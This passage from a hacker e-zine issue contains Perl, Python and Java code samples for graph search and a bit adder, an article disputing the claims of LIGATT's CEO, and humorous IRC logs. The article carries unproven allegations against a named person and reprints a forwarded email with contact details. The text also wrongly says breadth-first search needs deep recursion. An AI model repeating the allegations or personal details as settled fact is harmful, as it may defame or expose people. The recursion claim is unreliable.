- Language: Perl
- --------------------
- #!/usr/bin/perl
- use strict;
- use warnings;
- my $obj = { points => build_tree(<DATA>) };
- # Uncomment for examples given in the article
- =pod
- for ('C', 'D', 'E')
- {
-     my $end = breadth_first($obj, 'A', $_);
-     my $mid = depth_first($obj, 'A', $_);
-     print "A -> $_ : DF=$mid BF=$end\n";
- }
- exit;
- =cut
- for my $first (sort { $a cmp $b } keys %{$obj->{points}})
- {
-     for my $second (sort { $a cmp $b } keys %{$obj->{points}})
-     {
-         my $df = depth_first($obj, $first, $second);
-         my $bf = breadth_first($obj, $first, $second);
-         my $message = ($df != -1 && $df < $bf)
-             ? "Depth-First"
-             : ($df > $bf && $bf != -1)
-                 ? "Breadth-First"
-                 : "Tie";
-         print "$first -> $second : DF=$df, BF=$bf : $message\n";
-     }
- }
- # The data structure I'm using is a hashref with letters as keys,
- # and an arrayref (as the value) listing its neighbours
- sub build_tree
- {
-     my (@input) = @_;
-     my $vertex = {};
-     # Not strictly necessary but this + the check below is good for catching typos
-     while ($input[0] =~ /(\w+)[,}]/g)
-     {
-         $vertex->{$1} = [];
-     }
-     while ($input[1] =~ /\{(\w+)\,(\w+)\}/g)
-     {
-         defined $vertex->{$1} and defined $vertex->{$2} or die "Malformed point [$1,$2]";
-         push @{$vertex->{$1}}, $2;
-         push @{$vertex->{$2}}, $1;
-     }
-     $vertex;
- }
- # Setup the structure and enter recursion
- sub depth_first
- {
-     my ($obj, $start, $end ) = @_;
-     $obj = { checked => [], points => $obj->{points} };
-     $start eq $end and return 0;
-     _depth_first($obj, $start, $end);
- }
- # Check all trees from a starting point
- sub _depth_first
- {
-     my ($obj, $start, $end) = @_;
-     defined $obj->{checked} or $obj->{checked} = [];
-     push @{$obj->{checked}}, $start;
-     for my $neighbour (sort { $a cmp $b } @{$obj->{points}{$start}})
-     {
-         # We can exclude previously checked items
-         grep { $_ eq $neighbour } @{$obj->{checked}} and next;
-         push @{$obj->{checked}}, $neighbour;
-         $neighbour eq $end and return 1;
-         my $counter = _depth_first($obj, $neighbour, $end);
-         $counter != -1 and return $counter + 1;
-     }
-     return -1;
- }
- # Surely there is a pretty and short recursive way to do this
- sub breadth_first
- {
-     my ($obj, $start, $end) = @_;
-     $start eq $end and return 0;
-     my $tree = $obj->{points}{$start};
-     my $level = 0;
-     # Remember every vertex already reached so an unreachable target terminates
-     # with -1 instead of bouncing between visited vertices forever
-     my %seen = ($start => 1);
-     @$tree = sort { $a cmp $b } @$tree;
-     while (1)
-     {
-         ++$level;
-         # An empty frontier means $end is unreachable (disconnected graph)
-         @$tree or return -1;
-         grep { $_ eq $end } @$tree and return $level;
-         $seen{$_} = 1 for @$tree;
-         # We don't want to add items and then sort
-         # We want to add sorted lists to preserve correct ordering
-         my $temp = [];
-         for my $item ( sort { $a cmp $b } @$tree )
-         {
-             # Only carry forward neighbours that have not been reached yet
-             push @$temp, grep { !$seen{$_} } @{$obj->{points}{$item}};
-         }
-         $tree = $temp;
-     }
- }
- # Uncomment for smaller graph from article
- =pod
- __DATA__
- V = {A,B,C,D,E}
- E = {{A,B},{A,C},{B,C},{B,D},{B,E},{C,D},{D,E}}
- __END__
- =cut
- __DATA__
- V = {A,B,C,D,E,F,G,H}
- E = {{A,B},{A,D},{A,F},{B,G},{B,H},{C,D},{C,E},{D,E},{D,F},{F,G},{G,H}}
- --------------------
- $ perl graph.pl
- A -> A : DF=0, BF=0 : Tie
- A -> B : DF=1, BF=1 : Tie
- A -> C : DF=5, BF=2 : Breadth-First
- A -> D : DF=4, BF=1 : Breadth-First
- A -> E : DF=6, BF=2 : Breadth-First
- A -> F : DF=3, BF=1 : Breadth-First
- A -> G : DF=2, BF=2 : Tie
- A -> H : DF=3, BF=2 : Breadth-First
- B -> A : DF=1, BF=1 : Tie
- B -> B : DF=0, BF=0 : Tie
- B -> C : DF=3, BF=3 : Tie
- B -> D : DF=2, BF=2 : Tie
- B -> E : DF=4, BF=3 : Breadth-First
- B -> F : DF=3, BF=2 : Breadth-First
- B -> G : DF=4, BF=1 : Breadth-First
- B -> H : DF=5, BF=1 : Breadth-First
- C -> A : DF=2, BF=2 : Tie
- C -> B : DF=3, BF=3 : Tie
- C -> C : DF=0, BF=0 : Tie
- C -> D : DF=1, BF=1 : Tie
- C -> E : DF=2, BF=1 : Breadth-First
- C -> F : DF=5, BF=2 : Breadth-First
- C -> G : DF=4, BF=3 : Breadth-First
- C -> H : DF=5, BF=4 : Breadth-First
- D -> A : DF=1, BF=1 : Tie
- D -> B : DF=2, BF=2 : Tie
- D -> C : DF=1, BF=1 : Tie
- D -> D : DF=0, BF=0 : Tie
- D -> E : DF=2, BF=1 : Breadth-First
- D -> F : DF=4, BF=1 : Breadth-First
- D -> G : DF=3, BF=2 : Breadth-First
- D -> H : DF=4, BF=3 : Breadth-First
- E -> A : DF=3, BF=2 : Breadth-First
- E -> B : DF=4, BF=3 : Breadth-First
- E -> C : DF=1, BF=1 : Tie
- E -> D : DF=2, BF=1 : Breadth-First
- E -> E : DF=0, BF=0 : Tie
- E -> F : DF=6, BF=2 : Breadth-First
- E -> G : DF=5, BF=3 : Breadth-First
- E -> H : DF=6, BF=4 : Breadth-First
- F -> A : DF=1, BF=1 : Tie
- F -> B : DF=2, BF=2 : Tie
- F -> C : DF=3, BF=2 : Breadth-First
- F -> D : DF=2, BF=1 : Breadth-First
- F -> E : DF=4, BF=2 : Breadth-First
- F -> F : DF=0, BF=0 : Tie
- F -> G : DF=3, BF=1 : Breadth-First
- F -> H : DF=4, BF=2 : Breadth-First
- G -> A : DF=2, BF=2 : Tie
- G -> B : DF=1, BF=1 : Tie
- G -> C : DF=4, BF=3 : Breadth-First
- G -> D : DF=3, BF=2 : Breadth-First
- G -> E : DF=5, BF=3 : Breadth-First
- G -> F : DF=4, BF=1 : Breadth-First
- G -> G : DF=0, BF=0 : Tie
- G -> H : DF=2, BF=1 : Breadth-First
- H -> A : DF=2, BF=2 : Tie
- H -> B : DF=1, BF=1 : Tie
- H -> C : DF=4, BF=4 : Tie
- H -> D : DF=3, BF=3 : Tie
- H -> E : DF=5, BF=4 : Breadth-First
- H -> F : DF=4, BF=2 : Breadth-First
- H -> G : DF=5, BF=1 : Breadth-First
- H -> H : DF=0, BF=0 : Tie
- By running this script, we can clearly see from the output that breadth-first search is the winning
- algorithm of the two. However, this is not always the case. Some graphs are better traversed by
- depth-first search, others by breadth-first search, and a judgment call must be made depending on
- the specific scenario. For instance, massive graphs with a target that is many hops away from the
- origin point will more likely be searched by depth-first search simply due to resource limitations.
- Breadth-first search of a massive graph requires many layers upon layers of recursion. An entire
- "tree" must be stored in memory, which will quickly run low as the tree grows, causing swapping to
- occur or the system to crash when the available RAM hits zero. With depth-first search, only a
- single "branch" of recursion is stored in memory, requiring much less space.
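- To make the memory argument concrete, here is an added Python example (not part of melte's
- solution or the zine) that parses the same V/E notation, runs both searches on the challenge graph,
- and reports the peak queue size for breadth-first and the peak stack depth for depth-first next to
- the hop counts. The depth-first walk keeps the Perl solution's semantics (sorted neighbours, one
- shared visited set), so its hop counts match the table above; the breadth-first walk uses a visited
- set so that it also terminates with -1 on a disconnected graph.

```python
"""BFS vs DFS on the challenge graph, with the memory footprint each search needs (added example)."""
from collections import deque
import re

# Same V/E notation the Perl solution reads from its __DATA__ section.
CHALLENGE_GRAPH = """\
V = {A,B,C,D,E,F,G,H}
E = {{A,B},{A,D},{A,F},{B,G},{B,H},{C,D},{C,E},{D,E},{D,F},{F,G},{G,H}}
"""


def build_graph(text):
    """Parse 'V = {...}' / 'E = {{x,y},...}' into an adjacency dict of sorted neighbour lists."""
    v_line, e_line = text.strip().splitlines()
    adj = {v: [] for v in re.findall(r"(\w+)[,}]", v_line)}
    for a, b in re.findall(r"\{(\w+),(\w+)\}", e_line):
        if a not in adj or b not in adj:
            raise ValueError(f"malformed edge {{{a},{b}}}")
        adj[a].append(b)
        adj[b].append(a)
    return {v: sorted(ns) for v, ns in adj.items()}


def breadth_first(adj, start, end):
    """Return (shortest hop count, peak number of vertices queued at once); -1 hops if unreachable."""
    if start == end:
        return 0, 0
    visited = {start}
    queue = deque([(start, 0)])
    peak = 1
    while queue:
        vertex, hops = queue.popleft()
        for n in adj[vertex]:
            if n in visited:
                continue
            if n == end:
                return hops + 1, peak
            visited.add(n)
            queue.append((n, hops + 1))
            peak = max(peak, len(queue))
    return -1, peak


def depth_first(adj, start, end):
    """Return (hops along the first path found, deepest stack level reached); -1 hops if unreachable.

    Mirrors the Perl solution: sorted neighbour order and a single visited set that is never
    unwound, so the hop count is that of the first route DFS stumbles on, not the shortest.
    """
    if start == end:
        return 0, 0
    visited = {start}
    peak = [0]

    def walk(vertex, depth):
        peak[0] = max(peak[0], depth)
        for n in adj[vertex]:
            if n in visited:
                continue
            visited.add(n)
            if n == end:
                return 1
            hops = walk(n, depth + 1)
            if hops != -1:
                return hops + 1
        return -1

    return walk(start, 1), peak[0]


def compare(adj, start, end):
    """Label the winner the way the Perl solution does (fewer hops wins, -1 means unreachable)."""
    df, _ = depth_first(adj, start, end)
    bf, _ = breadth_first(adj, start, end)
    if df != -1 and df < bf:
        return "Depth-First"
    if bf != -1 and df > bf:
        return "Breadth-First"
    return "Tie"


if __name__ == "__main__":
    graph = build_graph(CHALLENGE_GRAPH)
    for target in sorted(graph):
        df, stack = depth_first(graph, "A", target)
        bf, queue = breadth_first(graph, "A", target)
        print(f"A -> {target} : DF={df} (stack {stack}), BF={bf} (queue {queue}) : "
              f"{compare(graph, 'A', target)}")
```

- On this small graph the numbers are close, but the two "peak" columns already show the trade-off
- the paragraph describes: the queue grows with the width of each level, while the stack only grows
- with the length of the current branch.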
- --------------------
- Additionally, as an amendment to issue #3, we missed a solution submitted by Suzaku for the
- challenge of writing any one of a number of bit adders.
- Ripple-Carry Adder by Suzaku
- Language: Java
- --------------------
- import java.util.Scanner;
- class adder{
-     public static void main(String args[]){
-         int bitS[],obA[],obB[],i,cin=0,cout=0;
-         String bitA,bitB;
-         char a,b;
-         Scanner input=new Scanner(System.in);
-         obA=new int[100];
-         obB=new int[100];
-         bitS=new int[100];
-         System.out.println("Enter the bit pattern A");
-         // Reverse the input so index 0 is the least significant bit, where the carry chain starts
-         bitA=new StringBuffer(input.next()).reverse().toString();
-         System.out.println("Enter the bit pattern B");
-         bitB=new StringBuffer(input.next()).reverse().toString();
-         if(bitA.length()==bitB.length()){
-             System.out.print("Sum = ");
-             for(i=0; i<bitA.length(); i++){
-                 obA[i]=Integer.parseInt(new Character(bitA.charAt(i)).toString());
-                 obB[i]=Integer.parseInt(new Character(bitB.charAt(i)).toString());
-                 // Full adder: sum = a XOR b XOR cin, cout = ab + cin(a XOR b)
-                 bitS[i]=obA[i]^obB[i]^cin;
-                 cout=(obA[i]*obB[i])+cin*(obA[i]^obB[i]);
-                 cin=cout;
-             }
-             // Print most significant bit first
-             for(; i>0; i--)
-                 System.out.print(bitS[i-1]);
-             System.out.print("\nCarry = "+cout);
-         }
-         else
-             System.out.print("Length of A and B should be same");
-     }
- }
- [==================================================================================================]
- -=[ 0x0d The Scoop on LIGATT
- LIGATT Security International (more commonly known as just LIGATT) is a security company founded and
- run by the (in)famous Gregory D. Evans. Evans is mainly known for his claim of being the "world's
- number 1 hacker" and his ability to teach anyone to be the same in 15 minutes through one of his
- company's educational courses. Much controversy surrounds Evans and his company, with allegations of
- severe debt, shady marketing schemes, and an overall lack of the security knowledge necessary to
- provide consulting services of any capacity. Attrition.org claims that Evans is currently in debt
- of over $9,000,000 USD, and the Better Business Bureau currently gives LIGATT an 'F' rating.
- Evans denies all counts of misdoing and considers himself a wealthy, successful businessman.
- In mid-January, Go Null Yourself Zine contacted LIGATT to request an interview with Evans. After a
- few days of conversation with Evans' PR assistant, the interview request was accepted. The
- interview spanned across two days (due to phone difficulties) and about 2 hours and 10 minutes of
- conversation was recorded. A detailed look at Evans' past was provided, and many shots were taken
- at the people and organizations calling him a fraud.
- There are simply too many details from the interview to enumerate here, so we have instead made the
- recordings public at http://www.gonullyourself.org/zine/4/ligatt for those who are interested.
- After the interview, we contacted Attrition.org to get their take on everything told to us by Evans.
- We provided a list of key claims made by Evans, and this is their reply:
- All of this is to the best of my memory, or with citation if I have it.
- : Evans lived in Germany in his youth and got in trouble for changing a
- : friend's grades. The father of this friend, who was a lawyer, hired
- : Evans (as a kid) to break into the computers of a competing law firm.
- I think this is partially new. The 'changing grades' claim has been made
- before, but not with additional details above.
- : In 1994, Evans operated the 4th or 5th largest ISP in the country named
- : Connect America financed by money made from hacking side-jobs. (I am
- : unsure if he meant in America or Germany)
- In the US, in California. Claims of the size are unverified, and I doubt
- they can be. The part about making money from hacking side-jobs is likely
- BS. During this time with Connect America, he was stealing phone lines and
- reselling them. This is basic toll fraud, and what led him to getting
- busted and serving 2 years in prison.
- http://attrition.org/errata/charlatan/gregory_evans/ligatt15/1998-MCIvEvans-Connect_America.pdf
- : Evans was friends with Kevin Mitnick in California, and they learned
- : about computers and phreaking together.
- This is a lie. Kevin Mitnick confirmed that while they were on the same
- floor of the LA detention center, they did not share a cell (as previously
- claimed by Evans), did not share any hacking / phreaking information, and
- did not learn from each other. Mitnick described Evans as someone who
- didn't seem to know much about hacking and asked basic questions. You can
- confirm this with a mail to Mitnick, and some of it covered here:
- http://attrition.org/errata/charlatan/gregory_evans/evans09.html
- http://twitter.com/kevinmitnick/statuses/16428972158
- http://twitter.com/kevinmitnick/statuses/16429370781
- : Evans has 100 employees and has hired people in Pakistan and India.
- This is hard to positively debunk, but I am relatively sure he does not
- have 100 employees currently. He has likely had 100 historically, but has
- a very high turnover rate. His claims of consultants in other countries
- make this basically impossible to verify, especially since he has not
- published financials for 2010 as required by the SEC.
- : The term "number 1 hacker" came from Mr. Morris, the FBI agent that
- : arrested Evans, who described Evans as on the "top 10 list of number 1
- : hackers."
- This is a new claim (re: Morris), but based on my experience with the FBI
- seems absurd. Evans was convicted of toll fraud, not really 'hacking'. At
- that time, the FBI had seen some pretty high end / impressive hacking, and
- what Evans was doing didn't come close.
- : Evans owned nightclubs, restaurants, apartment complexes, Bentleys, and
- : a $4 million house.
- None of this can be verified so far, and we've tried. Given the apartments
- he has lived in for the last 2 years, as verified by ex-employees, it is
- unlikely he has had any significant money to do this. Based on court
- records we have published, he likely has never actually had 1 million
- dollars, just serious debt, including the ~ 10 million he still owes. Even
- now, he owes serious money not only for the previous crimes, but as a
- result of his business dealings the last few years. We have some of the
- records:
- http://attrition.org/errata/charlatan/gregory_evans/ligatt15/
- A summary of his debt:
- http://attrition.org/errata/charlatan/gregory_evans/evans21.html
- : Evans's book "Laptop Security" sold 150,000 copies.
- We have not heard this claim. However, search Amazon for that title and
- look how many are available new/used, and it is likely false. It's curious
- he is focusing on that book, as all of his previous claims centered around
- the 'No 1 Hacker' book.
- : The material found online in Evans's "No. 1 Hacker" book was not
- : copyrighted and therefore was not legally forbidden to use.
- This is patently false. The material he found online *was* copyrighted,
- even if the work did not explicitly say it was. This is copyright 101.
- There is currently a group of the authors that are still considering
- taking action against him. I have personally read mails from half a dozen
- of these authors that confirm they hold the copyright, and that they did
- NOT give him permission or sell it to him (as he claimed in other
- sources). A mail to Simple Nomad of NMRC will confirm this as one of the
- authors (who will reply and confirm, while others will not due to
- potential legal action).
- : Evans was contracted to set up a CCTV camera network at a county prison
- : while on probation.
- Never heard this claim, but given how prisons work (and two direct family
- members that worked in that system), this is very dubious.
- : Evans has committed "every type of high-tech crime you can ever think of
- : before [he] was 26-years-old."
- Again, his conviction was for basic toll fraud. This doesn't suggest any
- level of skill that would back this claim.
- : In 1998, Evans was interrogated by the authorities regarding a
- : system-wide crash of the SkyTel pager network.
- No way to verify this short of a FOIA request for that case. I have not
- heard this claim before.
- : Every time Evans was caught by the authorities, it was because someone
- : else snitched on him.
- The current court records do not suggest this. They do suggest that Evans
- was a snitch (see Mitnick's presentation last year about the topic). We
- have the docket for his big case online, and there is no mention of a
- snitch.
- http://attrition.org/errata/charlatan/gregory_evans/ligatt15/1998-MCIvEvans-Connect_America.pdf
- http://attrition.org/errata/charlatan/gregory_evans/ligatt07/
- : "High-tech grand theft" is a new state crime that was formed
- : specifically because of Evans's actions.
- There is no state law that uses those words I bet =) Did he mean Georgia?
- How 'new'? This would be easy to verify unless he further spins the claim.
- : There are plenty more points, but there's just too much stuff to listen
- : to. It's not too bad of a list, anyways.
- As usual, and it isn't just Evans, these types of claims are almost always
- made without any real detail, no verification from HIM, etc.
- Unfortunately, a lot of these are new claims or have new elements we
- haven't seen.
- : I have also attached an email that Evans forwarded to me that may be of
- : interest to you. Thank you again for your time, and I look forward to
- : your response to these claims.
- Yep, np! If you want to run any other claims by me, feel free. I will be
- offline for about 24 hours starting Thursday as I fly back to the states.
- As for the e-mail, I have read it before actually via Don. It was not
- published on attrition.org because it is irrelevant to Evans' claims.
- Because he offered to buy a web site, doesn't mean any deal was made
- regarding publishing material written by Don. It does not speak to any
- agreement, purchase or transfer of copyright of text included in Evans
- book. So yes, it wasn't included on our site =) As always, showing one
- thing that is marginally related to a piece of another story isn't proof,
- but it is an essential tool in a con.
- - jericho
- The attached email mentioned above can be read here. Evans forwarded this to us after the interview:
- Sorry we got disconnected. Here is proof that I sent Donald an email asking to buy his website
- 6 months beforehand, proving that there was no malicious intent. This is the stuff that they
- did not put on Attrition.org. Also if you want to finish up just let me know.
- Begin forwarded message:
- > From: "EH-Net-Don" <don@ethicalhacker.net>
- > Date: December 17, 2009 12:15:13 PM EST
- > To: "'Gregory Evans'" <gregoryevans@ligatt.com>
- > Subject: [SPAM] RE: Purchase of Ethical Hacker Network
- > Reply-To: <don@ethicalhacker.net>
- >
- > Hey Gregory,
- >
- > Thank you very much for your kind words. It’s never a bad thing to have your blood, sweat and
- > tears get recognized in a positive way. Although I’m not sure selling is my desire at the
- > moment, I’m always willing to talk business and make new friends in the industry. Either way,
- > you might be interested in getting the word out about your company and its products and
- > services to a wider ethical hacking community. Maybe we could also chat about advertising on
- > my site and/or supporting my ethical hacking conference, ChicagoCon. How’s that for a reverse
- > pitch? ;-)
- >
- > If you don’t mind me asking, how did you find out about us?
- >
- > Looking forward,
- > Don
- >
- > PS – There's a typo in your LA address. Guess I can't stop being an editor. :-)
- > Donald C. Donzal, CISSP, MCSE 2003, CEH, Security+ SME
- > The Digital Construction Company
- > 1520 Heidorn Ave.
- > Westchester, IL 60154
- > 708.837.3002 (Cell)
- > Founder & Organizer
- > ChicagoCon
- > Editor-In-Chief
- > The Ethical Hacker Network
- >
- >
- >
- > From: Gregory Evans [mailto:gregoryevans@ligatt.com]
- > Sent: Wednesday, December 16, 2009 11:38 PM
- > To: don@ethicalhacker.net
- > Subject: Purchase of Ethical Hacker Network
- >
- > Hello Donzal,
- >
- > My name is Gregory Evans the CEO of LIGATT Security International (www.ligatt.com). I am very
- > impressed with your website Ethical Hacker Network. I would love to speak to you sometime
- > about purchasing the website and still having you run the site. If you are interested please
- > feel to contact me at 866-354-4288 Ext. 5673.
- >
- > Have a Blessed Day,
- >
- > Gregory Evans
- > President / CEO
- >
- > 866-354-4288 Ext. 5673
- >
- > Atlanta:
- > 6050 Peachtree Parkway
- > Suite 200
- > Norcross, Ga 30092
- >
- > Los Angeles:
- > 11209 Naitonal Blvd.
- > Suite 178
- > Los Angeles, Ca 90292
- >
- Have a Blessed Day,
- Gregory Evans
- President / CEO
- Ring: 866-354-4288 Ext. 5673
- Look: www.LIGATT.COM
- Follow: www.twitter.com/ligatt
- Post: www.facebook.com/GregoryDEvans
- Atlanta
- 6050 Peachtree Parkway
- Suite 200
- Norcross, Ga 30092
- As if there wasn't enough drama already, on February 2, a message was broadcast to the
- Full-Disclosure mailing list detailing the compromise of Evans' websites and email accounts, leaking
- hordes of personal and confidential information. We, personally, have taken little time to look
- through the leak and aren't able to better confirm or deny any claims made by Evans. There is most
- likely much to learn, though, according to Jericho:
- : Thank you very much for providing insight on these claims. Would it be
- : okay to publish this email in the zine? I think it would be interesting
- : to place this side-by-side with the interview.
- Yep, feel free. Also note, that with recent events (Evans' entire mail
- spool being leaked / published), some of these claims may be more
- thoroughly debunked in the coming weeks. As an example, his mail spool
- shows that he did register thecyberwars.com despite repeated claims he had
- nothing to do with it.
- : > : Evans owned nightclubs, restaurants, apartment complexes, Bentleys, and
- : > : a $4 million house.
- : >
- : > None of this can be verified so far, and we've tried. Given the apartments
- : > he has lived in for the last 2 years, as verified by ex employees, it is
- A recent mail leaked from his spool shows that he could not even rent an
- apartment under his mom's name after they performed due diligence. When
- confronted with it, Evans libels attrition:
- http://pastebin.com/J4JeG2W8
- : > A summary of his debt:
- : >
- : > http://attrition.org/errata/charlatan/gregory_evans/evans21.html
- Updated with another entry since this mail.
- Also,
- : Additionally, I found these the other day; you may also find them wildly
- : amusing:
- :
- : http://www.theregister.co.uk/2011/01/31/ligatt_security_subpoena_quashed/
- Already posted on the charlatan page.
- : http://www.escapistmagazine.com/news/view/107413-Computer-Hackers-Getting-Their-Own-Reality-Show
- He claims his life story was bought for a movie, that never materialized.
- As I tweeted the other day:
- Hey @GregoryDEvans or @LIGATT .. any comment on why the last movie deal
- went nowhere? http://in.sys-con.com/node/927014
- If he did get a reality show, why doesn't he name the network / company
- that bought it?
- And,
- : "I have to be modest and say that we at LIGATT could not have been able
- : to do this without the help of Chris John Riley, Kris French, Sam Bowne,
- : Elizabeth Summers, Atrrion.org, Crabbybastard.com and all the other
- : people who kept our name relevant. What sealed the deal for us and got
- : the networks to say, 'lets do it' was 'LIGATTleaks'. Again, I have shown
- : that what people may say about you or try to do to you does not stand in
- : the way of my success. Success is the best revenge," says Evans.
- :
- : Thought that was funny.
- Yep, that is his new strategy for the last few weeks, he said the same
- thing in one of his recent video blogs as well.
- -=-=-
- If you would like to weigh in on the interview, the LIGATT controversy, or anything related to
- LIGATT, Gregory D. Evans, or the leak, our contact information is in the introduction - we will
- publish intelligent arguments and opinions (both for and against) in the next issue.
- [==================================================================================================]
- -=[ 0x0e Et Cetera, Etc.
- -=[ Author: teh crew
- In the absence of any real miscellaneous content, why not take a look at some of the shenanigans
- that go on in the good ol' #gny.
- We're competent! We promise!
- ----------------------------------------------------------------------------------------------------
- [16:22] <GNY'oliverjhudson93> It is expected on February 3rd, 2011, that there will be a formal
- announcement in the US that IPv4 addresses have been completely exhausted
- [16:23] <GNY'connection> yes
- [16:23] <GNY'connection> but they finished today
- [16:23] <GNY'oliverjhudson93> who got the last one?
- [16:23] <GNY'connection> fucked if i know
- [16:23] <GNY'oliverjhudson93> was it 999.999.999.999
- [16:23] <GNY'connection> but I would sell it
- [16:23] <GNY'connection> oliverjhudson93, I hope you are trolling
- [16:23] <GNY'connection> cause otherwise
- [16:23] <GNY'connection> that was the most retarded thing
- [16:23] <GNY'connection> I have ever heard
- [16:23] <GNY'oliverjhudson93> nah i'm pulling your leg :P
- [16:23] <GNY'connection> good
- [16:23] <GNY'oliverjhudson93> (im joking)
- [16:24] <Silks> cough liar
- [16:24] <GNY'connection> you are joking about lying?
- [16:24] <GNY'oliverjhudson93> i'm joking about joking?
- [16:24] <GNY'oliverjhudson93> I don't know anymore
- [16:24] <GNY'oliverjhudson93> I'm gonna DDoS 127.0.0.1 D:
- [16:25] <GNY'connection> oliverjhudson93, what is the highest IP someone could have?
- [16:25] <GNY'connection> not even taking into account the limits set in place for broadcasts blah
- blah blah
- [16:25] <GNY'connection> straight up, highest IP address
- [16:25] <GNY'oliverjhudson93> 255
- [16:26] <GNY'oliverjhudson93> I don't actually know
- [16:26] <GNY'oliverjhudson93> but i figure
- [16:26] <GNY'oliverjhudson93> 255.255.255.255?
- [16:26] <GNY'oliverjhudson93> but thats like
- [16:26] <GNY'oliverjhudson93> subnet mask or some shit that I don't understand
- [16:26] <GNY'connection> technically it's 256.256.256.256
- [16:26] <GNY'connection> but as we have limits imposed
- [16:26] <GNY'connection> yes
- [16:26] <GNY'connection> 255.255.255.255
- [16:26] <GNY'oliverjhudson93> See I dun goof'd!
- [16:27] <Silks> urr no
- [16:27] <Silks> it is 0-255
- [16:27] <GNY'connection> yea I fubar'd
- [16:27] <Silks> because that is the range of values you can store in an 8bit number
- [16:27] <GNY'connection> you don't know
- [16:27] <GNY'connection> how hard
- [16:27] <GNY'connection> I headdesked
- [16:27] <GNY'connection> after I typed that
- [16:27] <GNY'oliverjhudson93> :P
- [16:27] <Silks> I am embarrassed for you
- [16:27] <GNY'connection> and was hoping no one would catch it
- A shitty situation
- ----------------------------------------------------------------------------------------------------
- [21:58] <&elchupathingy> storm would you be pissed if i took a shit on your porch?
- [22:05] <~Silks> what if I were to?
- [22:06] <&storm> i would be curious to see that since i don't have a porch
- [22:06] <~Silks> what do you have that I could shit on?
- [22:07] <&storm> the dorm building has a stoop, i guess
- [22:07] <&storm> well, not really actually
- [22:08] <~Silks> what about siblings?
- [22:08] <~Silks> do you have a sister?
- [22:08] <&storm> i'm an only child
- [22:08] <&storm> :(
- [22:08] <~Silks> ditto
- [22:08] <~Silks> however that means you have a lot of stuff
- [22:08] <~Silks> and therefore a lot of things to be fouled
- [22:09] <&storm> this is very true
- [22:10] <&elchupathingy> what if
- [22:10] <&elchupathingy> we built a porch
- [22:10] <&elchupathingy> then shit on it
- [22:10] <&storm> i like your thinking
- GTFO emo storm
- ----------------------------------------------------------------------------------------------------
- [01:12] <storm> sometimes i message myself to check if i'm still connected
- [01:13] <elchupathingy> that sounds depressing as hell
- We could go on, but that would only embarrass us more. And everyone knows the first rule to being a
- sooper l33t h4xx0r klan is to only portray yourselves as FUCKING HARDCORE MOTHERFUCKERS.
- Yeah, whatever.
- So, yeah. Looks like the end of issue #4 - hope you liked it. Like always, if you'd like to submit
- content for future issues, our contact information is in the introduction. The call for papers for
- issue #5 is now open, so get your crap in.
- See you in the summer.
- <3, the gny crew
- irc.gonullyourself.org +6697 #gny
- [==================================================================================================]